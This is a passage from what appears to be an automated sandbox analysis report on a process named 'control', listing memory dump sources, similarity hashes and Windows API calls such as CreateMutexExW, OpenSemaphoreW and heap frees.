                                  • __p__commode.MSVCRT ref: 00873FE6
                                  • __setusermatherr.MSVCRT ref: 00874007
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                  • String ID:
                                  • API String ID: 1632413811-0
                                  • Opcode ID: a4e4ac388297e8cfa903553665a8f93e6e8e0b8d44bbde094a59b370a63518d5
                                  • Instruction ID: 79fc05a5f79ad206f3cea818df1e969dbc0a4a8d1055c37f57e4122c3b7f7f56
                                  • Opcode Fuzzy Hash: a4e4ac388297e8cfa903553665a8f93e6e8e0b8d44bbde094a59b370a63518d5
                                  • Instruction Fuzzy Hash: 3DF0D470444304DFD624AF34A84E2083BA1FB15322B50961CE12EC73F9CF75C080CB11
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: d96feb5e495916607a78e374944091abc1297174e2b17225bec7c1ede1cef195
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 1F917271F0021A9ADB24FE6ACC81ABEB7A5FF44720F64451FE855E72D1E730E9409760
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 748e0d6a69270a53ebe2117a3b588eb4024639d2122a340ad67bae0c0fbc1a34
                                  • Instruction ID: aaf0164c61b5717a3d71a59398bbf887d5fa506221d097e49f6ee0711fbbca30
                                  • Opcode Fuzzy Hash: 748e0d6a69270a53ebe2117a3b588eb4024639d2122a340ad67bae0c0fbc1a34
                                  • Instruction Fuzzy Hash: 3C812DB1D012699BDB31CB65CC54BEEB7B4BB48714F0441EAA919B7240E730AE84CFA0
                                  APIs
                                  • GetCurrentProcessId.KERNEL32(00000040), ref: 00875273
                                  • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001), ref: 008752A7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CreateCurrentMutexProcess
                                  • String ID: Local\SM0:%d:%d:%hs
                                  • API String ID: 3937467467-4162240545
                                  APIs
                                  • GetCurrentProcessId.KERNEL32(000000A8), ref: 008753AC
                                  • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001), ref: 008753E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CreateCurrentMutexProcess
                                  • String ID: Local\SM0:%d:%d:%hs
                                  • API String ID: 3937467467-4162240545
                                  APIs
                                  • OpenSemaphoreW.KERNEL32(001F0003,00000000,?,_p0), ref: 00878C92
                                  • GetLastError.KERNEL32 ref: 00878CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ErrorLastOpenSemaphore
                                  • String ID: _p0
                                  • API String ID: 1909229842-2437413317
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00874FAD), ref: 00875504
                                  • HeapFree.KERNEL32(00000000,?,?,?,00874FAD), ref: 0087550B
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,00874FAD), ref: 00875529
                                  • HeapFree.KERNEL32(00000000), ref: 00875530
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0